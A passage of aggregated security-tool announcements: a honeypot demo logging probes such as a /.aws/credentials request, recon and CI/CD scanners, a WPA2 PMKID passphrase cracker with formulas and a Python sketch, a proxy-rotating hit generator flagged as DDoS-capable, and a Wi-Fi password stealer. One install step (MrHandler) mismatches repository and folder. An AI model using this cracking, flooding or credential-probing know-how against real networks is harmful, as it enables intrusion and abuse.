    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    πŸ˜‘

% curl http://localhost:8888/i-mean-are-you-a-fake-server
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!



    Url-Status-Checker - Tool For Swiftly Checking The Status Of URLs

    By: Zion3R



Status Checker is a Python script that checks the status of one or multiple URLs/domains and categorizes them based on their HTTP status codes. Version 1.0.0, created by BLACK-SCORP10 (t.me/BLACK-SCORP10).

    Features

    • Check the status of single or multiple URLs/domains.
• Asynchronous HTTP requests for improved performance (see the sketch after this list).
    • Color-coded output for better visualization of status codes.
    • Progress bar when checking multiple URLs.
    • Save results to an output file.
    • Error handling for inaccessible URLs and invalid responses.
    • Command-line interface for easy usage.
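The asynchronous approach from the feature list can be sketched in a few lines with aiohttp; this is an illustration of the technique under the assumption of an asyncio/aiohttp design, not the script's actual code:

import asyncio
import aiohttp

async def check(session: aiohttp.ClientSession, url: str) -> None:
    try:
        async with session.get(url, timeout=aiohttp.ClientTimeout(total=10)) as resp:
            print(f"{url} -> {resp.status}")  # color-coding would key off this value
    except Exception as exc:
        print(f"{url} -> error: {exc}")

async def main(urls: list[str]) -> None:
    async with aiohttp.ClientSession() as session:
        await asyncio.gather(*(check(session, u) for u in urls))

asyncio.run(main(["https://example.com", "https://example.org"]))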

    Installation

1. Clone the repository:

git clone https://github.com/your_username/status-checker.git
cd status-checker

2. Install dependencies:

pip install -r requirements.txt

    Usage

    python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
    • -d, --domain: Single domain/URL to check.
    • -l, --list: File containing a list of domains/URLs to check.
    • -o, --output: File to save the output.
    • -v, --version: Display version information.
    • -update: Update the tool.

    Example:

    python status_checker.py -l urls.txt -o results.txt

    Preview:

    License

    This project is licensed under the MIT License - see the LICENSE file for details.



    Noia - Simple Mobile Applications Sandbox File Browser Tool

    By: Zion3R


Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications' sandboxes and directly previewing SQLite databases, images, and more. Powered by frida.re.

Please note that I'm not a programmer, but I'm probably above the median in code-savviness. Try it out, and open an issue if you find any problems. PRs are welcome.


    Installation & Usage

    npm install -g noia
    noia

    Features

• Explore third-party applications' files and directories. Noia shows you details including the access permissions, file type and much more.

    • View custom binary files. Directly preview SQLite databases, images, and more.

    • Search application by name.

    • Search files and directories by name.

    • Navigate to a custom directory using the ctrl+g shortcut.

    • Download the application files and directories for further analysis.

    • Basic iOS support

    and more


    Setup

    Desktop requirements:

    • node.js LTS and npm
    • Any decent modern desktop browser

    Noia is available on npm, so just type the following command to install it and run it:

    npm install -g noia
    noia

    Device setup:

Noia is powered by frida.re and thus requires Frida to run.

    Rooted Device

    See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/

    Non-rooted Device

    • https://koz.io/using-frida-on-android-without-root/
    • https://github.com/sensepost/objection/wiki/Patching-Android-Applications
    • https://nowsecure.com/blog/2020/01/02/how-to-conduct-jailed-testing-with-frida/

    Security Warning

    This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.

    LICENCE

    MIT



    Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

    By: Zion3R

    About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


    What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject β€” in this case planes!

    Aircraft Information

    • Tail Number πŸ›«
    • Aircraft Type βš™οΈ
    • ICAO24 Designation πŸ”Ž
    • Manufacturer Details πŸ› 
    • Flight Logs πŸ“„
    • Aircraft Owner ✈️
    • Model πŸ›©
    • Much more!

    Usage

    To run skytrack on your machine, follow the steps below:

    $ git clone https://github.com/ANG13T/skytrack
    $ cd skytrack
    $ pip install -r requirements.txt
    $ python skytrack.py

skytrack works best with Python version 3.

    Preview

    Features

skytrack features three main functions for aircraft information gathering and display options. They include the following:

    Aircraft Reconnaissance & OSINT

    skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

    PDF Aircraft Information Report

skytrack also enables you to save the collected aircraft information into a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be titled "skytrack_report.pdf".

    Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumeric ID starting with the letter "N" used to identify aircraft. The ICAO designation is a six-character fixed-length ID in hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance, as both can be used to search for a specific aircraft in data sources. However, converting from one format to the other can be rather cumbersome, as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

    Further Explanation

    ICAO and Tail Numbers follow a mapping system like the following:

ICAO address    N-Number (Tail Number)
a00001          N1
a00002          N1A
a00003          N1AA

You can learn more about aircraft registration numbers here: https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers

⚠️ Converter only works for USA-registered aircraft

    Data Sources & APIs Used

    ICAO Aircraft Type Designators Listings

    FlightAware

    Wikipedia

    Aviation Safety Website

    Jet Photos Website

    OpenSky API

    Aviation Weather METAR

    Airport Codes Dataset

    Contributing

    skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

    Upcoming

    • Obtain Latest Flown Airports
    • Obtain Airport Information
    • Obtain ATC Frequency Information

    Support

    If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

    To check out my other works, visit my GitHub profile.



    MrHandler - Linux Incident Response Reporting

    By: Zion3R

    Β 


    MR.Handler is a specialized tool designed for responding to security incidents on Linux systems. It connects to target systems via SSH to execute a range of diagnostic commands, gathering crucial information such as network configurations, system logs, user accounts, and running processes. At the end of its operation, the tool compiles all the gathered data into a comprehensive HTML report. This report details both the specifics of the incident response process and the current state of the system, enabling security analysts to more effectively assess and respond to incidents.
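The collection step is plain SSH automation. A hedged paramiko sketch of that pattern (the diagnostic command list, host, and credentials are placeholders, not MR.Handler's actual set):

import paramiko

COMMANDS = ["uname -a", "who", "ss -tulpn", "ps aux"]  # placeholder diagnostics

def collect(host: str, user: str, password: str) -> dict:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, username=user, password=password)
    results = {}
    for cmd in COMMANDS:
        _, stdout, _ = client.exec_command(cmd)
        results[cmd] = stdout.read().decode(errors="replace")
    client.close()
    return results  # this mapping would feed the HTML report template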



    π—œπ—‘π—¦π—§π—”π—Ÿπ—Ÿπ—”π—§π—œπ—’π—‘ π—œπ—‘π—¦π—§π—₯π—¨π—–π—§π—œπ—’π—‘π—¦
$ pip3 install colorama
    $ pip3 install paramiko
    $ git clone https://github.com/emrekybs/BlueFish.git
    $ cd MrHandler
    $ chmod +x MrHandler.py
    $ python3 MrHandler.py


    Report



    WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications

    By: Zion3R


    WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.


    Done
    • [x] Scan Static Files.
    • [ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.)
    • [ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.

    Installation

    From Git
    git clone https://github.com/OsmanKandemir/web-wordlist-generator.git
    cd web-wordlist-generator && pip3 install -r requirements.txt
    python3 generator.py -d target-web.com

    From Dockerfile

You can run this application in a container after building the Dockerfile.

    docker build -t webwordlistgenerator .
    docker run webwordlistgenerator -d target-web.com -o

    From DockerHub

You can run this application in a container after pulling the image from DockerHub.

    docker pull osmankandemir/webwordlistgenerator:v1.0
    docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o

    Usage
    -d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com
    -p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080
    -a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    -o PRINT, --print PRINT Use Print outputs on terminal screen.
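The scanning idea itself is straightforward: fetch a page, strip the markup, and keep the unique tokens as wordlist candidates. A minimal Python illustration of that concept (requests and BeautifulSoup are assumed; this is not the generator's actual logic):

import re
import requests
from bs4 import BeautifulSoup

def page_wordlist(url: str) -> list[str]:
    html = requests.get(url, timeout=10).text
    text = BeautifulSoup(html, "html.parser").get_text(" ")
    # Keep alphanumeric tokens of a useful length, deduplicated and sorted
    return sorted({w.lower() for w in re.findall(r"[A-Za-z0-9_-]{4,}", text)})

for word in page_wordlist("https://target-web.com"):
    print(word)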



    BucketLoot - An Automated S3-compatible Bucket Inspector

    By: Zion3R


    BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

    The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

    Features

    Secret Scanning

Scans for 80+ unique RegEx signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
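The signature mechanism is plain regex-over-text. A hedged Python sketch of applying a regexes.json-style signature map to a file's contents (BucketLoot itself is written in Go; the two signatures shown are illustrative, not entries from the real file):

import json
import re

# Illustrative signatures in the spirit of regexes.json
SIGNATURES = {
    "AWS Access Key ID": r"AKIA[0-9A-Z]{16}",
    "Google API Key": r"AIza[0-9A-Za-z\-_]{35}",
}

def scan_text(name: str, text: str) -> list[dict]:
    findings = []
    for label, pattern in SIGNATURES.items():
        for match in re.finditer(pattern, text):
            findings.append({"file": name, "type": label, "match": match.group()})
    return findings

print(json.dumps(scan_text("config.txt", "key=AKIAIOSFODNN7EXAMPLE"), indent=2))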

    Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with an 80+ unique RegEx signature list in vulnFiles.json which allows users to flag these sensitive files based on file names or extensions.

    Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or other sensitive data? Dig Mode allows you to pass non-S3 targets and lets the tool scrape URLs from the response body for scanning.

    Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains and domains that could be present in an exposed storage bucket, giving you a chance of discovering hidden endpoints and an edge over other traditional recon tools.

    Searching

    The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

    To know more about our Attack Surface Management platform, check out NVADR.



    Raven - CI/CD Security Analyzer

    By: Zion3R


    RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub. We listed all vulnerabilities discovered using Raven in the tool's Hall of Fame.


    What is Raven

    The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

    • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
    • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
    • Query Library: We created a library of pre-defined queries based on research conducted by the community.
    • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

    Possible usages for Raven:

    • Scanner for your own organization's security
    • Scanning specified organizations for bug bounty purposes
    • Scan everything and report issues found to save the internet
    • Research and learning purposes

    This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

    Why Raven

    In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

    • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
    • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
• We detailed a completely different attack vector, 3rd-party integration risks, affecting the most popular project on GitHub and thousands more.
    • Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
    • Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.

    Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.

It was for these reasons that Raven was created: a framework for CI/CD security analysis (with GitHub Actions workflows as the first use case). In our focus, we examined complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.

    Setup && Run

    To get started with Raven, follow these installation instructions:

    Step 1: Install the Raven package

    pip3 install raven-cycode

    Step 2: Setup a local Redis server and Neo4j database

    docker run -d --name raven-neo4j -p7474:7474 -p7687:7687 --env NEO4J_AUTH=neo4j/123456789 --volume raven-neo4j:/data neo4j:5.12
    docker run -d --name raven-redis -p6379:6379 --volume raven-redis:/data redis:7.2.1

Another way to set up the environment is by running our provided docker compose file:

    git clone https://github.com/CycodeLabs/raven.git
    cd raven
    make setup

    Step 3: Run Raven Downloader

    Org mode:

    raven download org --token $GITHUB_TOKEN --org-name RavenDemo

    Crawl mode:

    raven download crawl --token $GITHUB_TOKEN --min-stars 1000

    Step 4: Run Raven Indexer

    raven index

    Step 5: Inspect the results through the reporter

    raven report --format raw

At this point, it is possible to inspect the data in the Neo4j database by connecting to http://localhost:7474/browser/.
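Besides the browser UI, the indexed graph can be queried programmatically with the official neo4j Python driver, using the default credentials from Step 2. The Cypher statement here is a generic label count for sanity-checking the index, not one of Raven's library queries:

from neo4j import GraphDatabase

driver = GraphDatabase.driver("neo4j://localhost:7687", auth=("neo4j", "123456789"))

with driver.session() as session:
    # Count indexed nodes per label to confirm the indexer ran
    for record in session.run("MATCH (n) RETURN labels(n) AS labels, count(*) AS cnt"):
        print(record["labels"], record["cnt"])

driver.close()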

    Prerequisites

    • Python 3.9+
    • Docker Compose v2.1.0+
    • Docker Engine v1.13.0+

    Infrastructure

Raven uses two primary Docker containers: Redis and Neo4j. make setup will run a docker compose command to prepare that environment.

    Usage

The tool contains three main functionalities: download, index, and report.

    Download

    Download Organization Repositories

    usage: raven download org [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] --org-name ORG_NAME

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --org-name ORG_NAME Organization name to download the workflows

    Download Public Repositories

    usage: raven download crawl [-h] --token TOKEN [--debug] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--max-stars MAX_STARS] [--min-stars MIN_STARS]

    options:
    -h, --help show this help message and exit
    --token TOKEN GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
    --debug Whether to print debug statements, default: False
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --max-stars MAX_STARS
    Maximum number of stars for a repository
    --min-stars MIN_STARS
Minimum number of stars for a repository, default: 1000

    Index

    usage: raven index [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI] [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS]
    [--clean-neo4j] [--debug]

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
--clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --debug Whether to print debug statements, default: False

    Report

    usage: raven report [-h] [--redis-host REDIS_HOST] [--redis-port REDIS_PORT] [--clean-redis] [--neo4j-uri NEO4J_URI]
    [--neo4j-user NEO4J_USER] [--neo4j-pass NEO4J_PASS] [--clean-neo4j]
    [--tag {injection,unauthenticated,fixed,priv-esc,supply-chain}]
    [--severity {info,low,medium,high,critical}] [--queries-path QUERIES_PATH] [--format {raw,json}]
    {slack} ...

    positional arguments:
    {slack}
    slack Send report to slack channel

    options:
    -h, --help show this help message and exit
    --redis-host REDIS_HOST
    Redis host, default: localhost
    --redis-port REDIS_PORT
    Redis port, default: 6379
    --clean-redis, -cr Whether to clean cache in the redis, default: False
    --neo4j-uri NEO4J_URI
    Neo4j URI endpoint, default: neo4j://localhost:7687
    --neo4j-user NEO4J_USER
    Neo4j username, default: neo4j
    --neo4j-pass NEO4J_PASS
    Neo4j password, default: 123456789
    --clean-neo4j, -cn Whether to clean cache, and index from scratch, default: False
    --tag {injection,unauthenticated,fixed,priv-esc,supply-chain}, -t {injection,unauthenticated,fixed,priv-esc,supply-chain}
    Filter queries with specific tag
    --severity {info,low,medium,high,critical}, -s {info,low,medium,high,critical}
    Filter queries by severity level (default: info)
    --queries-path QUERIES_PATH, -dp QUERIES_PATH
    Queries folder (default: library)
    --format {raw,json}, -f {raw,json}
    Report format (default: raw)

    Examples

    Retrieve all workflows and actions associated with the organization.

    raven download org --token $GITHUB_TOKEN --org-name microsoft --org-name google --debug

    Scrape all publicly accessible GitHub repositories.

    raven download crawl --token $GITHUB_TOKEN --min-stars 100 --max-stars 1000 --debug

    After finishing the download process or if interrupted using Ctrl+C, proceed to index all workflows and actions into the Neo4j database.

    raven index --debug

    Now, we can generate a report using our query library.

    raven report --severity high --tag injection --tag unauthenticated

    Rate Limiting

For effective rate limiting, you should supply a GitHub token. For authenticated users, the following rate limits apply:

    • Code search - 30 queries per minute
    • Any other API - 5000 per hour

    Research Knowledge Base

    Current Limitations

• It is possible to run an external action by referencing a folder with a Dockerfile (without action.yml). Currently, this behavior isn't supported.
• It is possible to run an external action by referencing a docker container through the docker://... URL. Currently, this behavior isn't supported.
• It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
    • We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.

    Future Research Work

• Implementation of taint analysis. Example use case: a user can pass a pull request title (which is a controllable parameter) to an action parameter named data. That action parameter may be used in a run command: - run: echo ${{ inputs.data }}, which creates a path for code execution.
    • Expand the research for findings of harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
    • Research whether actions/github-script has an interesting threat landscape. If it is, it can be modeled in the graph.

    Want more of CI/CD Security, AppSec, and ASPM? Check out Cycode

    If you liked Raven, you would probably love our Cycode platform that offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery.

    If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.



    Pmkidcracker - A Tool To Crack WPA2 Passphrase With PMKID Value Without Clients Or De-Authentication

    By: Zion3R


    This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.


    Program Usage

    python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>

NOTE: apmac, clientmac and pmkid must be hex strings, e.g. b8621f50edd9

    How PMKID is Calculated

    The two main formulas to obtain a PMKID are as follows:

1. Pairwise Master Key (PMK) calculation: PMK = PBKDF2(HMAC-SHA1, passphrase, salt = SSID, 4096 iterations, 256-bit output)
2. PMKID calculation: PMKID = HMAC-SHA1(PMK, "PMK Name" + AP MAC + client MAC), truncated to the first 128 bits

This is just for understanding; both are already implemented in find_pw_chunk and calculate_pmkid.
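For reference, the two formulas translate almost line-for-line into Python's standard library. The sketch below mirrors what calculate_pmkid does conceptually (a candidate passphrase is correct when the computed value equals the captured PMKID), but it is an independent illustration, not the tool's code:

import hashlib
import hmac

def pmkid_for(passphrase: str, ssid: str, ap_mac: str, client_mac: str) -> str:
    # 1. PMK: PBKDF2-HMAC-SHA1 with the SSID as salt, 4096 iterations, 256-bit key
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)
    # 2. PMKID: first 128 bits of HMAC-SHA1(PMK, "PMK Name" + AP MAC + client MAC)
    msg = b"PMK Name" + bytes.fromhex(ap_mac) + bytes.fromhex(client_mac)
    return hmac.new(pmk, msg, hashlib.sha1).hexdigest()[:32]

# print(pmkid_for("candidate123", "HomeWiFi", "b8621f50edd9", "aabbccddeeff"))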

    Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in Wireshark.

You may use Hcxtools or Bettercap to obtain the PMKID quickly without the steps below; the manual way is for understanding.

To obtain the PMKID manually from Wireshark, put your wireless antenna in monitor mode and start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL message 1. Follow the next three steps to obtain the fields needed for the arguments.

Open the pcap in Wireshark:

• Filter with wlan_rsna_eapol.keydes.msgnr == 1 in Wireshark to display only EAPOL message 1 packets.
• In the EAPOL 1 packet, expand the IEEE 802.11 QoS Data field to obtain the AP MAC and client MAC.
• In the EAPOL 1 packet, expand 802.1X Authentication > WPA Key Data > Tag: Vendor Specific; the PMKID is shown below it.

If the access point is vulnerable, you should see the PMKID value as in the screenshot below:

    Demo Run

    Disclaimer

    This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



    PhantomCrawler - Boost Website Hits By Generating Requests From Multiple Proxy IPs

    By: Zion3R


    PhantomCrawler allows users to simulate website interactions through different proxy IP addresses. It leverages Python, requests, and BeautifulSoup to offer a simple and effective way to test website behaviour under varied proxy configurations.

    Features:

    • Utilizes a list of proxy IP addresses from a specified file.
    • Supports both HTTP and HTTPS proxies.
    • Allows users to input the target website URL, proxy file path, and a static port.
    • Makes HTTP requests to the specified website using each proxy.
    • Parses HTML content to extract and visit links on the webpage.

    Usage:

    • POC Testing: Simulate website interactions to assess functionality under different proxy setups.
    • Web Traffic Increase: Boost website hits by generating requests from multiple proxy IPs.
    • Proxy Rotation Testing: Evaluate the effectiveness of rotating proxy IPs.
    • Web Scraping Testing: Assess web scraping tasks under different proxy configurations.
    • DDoS Awareness: Caution: The tool has the potential for misuse as a DDoS tool. Ensure responsible and ethical use.

Get new proxies (with ports) and add them to proxies.txt in this format: 50.168.163.176:80
• You can get them from https://free-proxy-list.net/. These free proxies are not validated and some might not work, so validate them before adding. A minimal sketch of the request-per-proxy loop follows.
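Below is a Python sketch of that loop using requests and BeautifulSoup (the proxies.txt format is the one shown above; the target URL is a placeholder, and this is an illustration rather than PhantomCrawler's actual code):

import requests
from bs4 import BeautifulSoup

TARGET = "https://example.com"  # placeholder target

with open("proxies.txt") as f:
    proxies = [line.strip() for line in f if line.strip()]

for proxy in proxies:
    proxy_map = {"http": f"http://{proxy}", "https": f"http://{proxy}"}
    try:
        resp = requests.get(TARGET, proxies=proxy_map, timeout=10)
        soup = BeautifulSoup(resp.text, "html.parser")
        links = [a["href"] for a in soup.find_all("a", href=True)]
        print(f"[{proxy}] {resp.status_code}, {len(links)} links found")
    except requests.RequestException as exc:
        print(f"[{proxy}] failed: {exc}")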

    How to Use:

1. Clone the repository:
git clone https://github.com/spyboy-productions/PhantomCrawler.git
2. Install dependencies:
pip3 install -r requirements.txt
3. Run the script:
python3 PhantomCrawler.py

    Disclaimer: PhantomCrawler is intended for educational and testing purposes only. Users are cautioned against any misuse, including potential DDoS activities. Always ensure compliance with the terms of service of websites being tested and adhere to ethical standards.


    Snapshots:

If you find this GitHub repo useful, please consider giving it a star!



    WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

    By: Zion3R


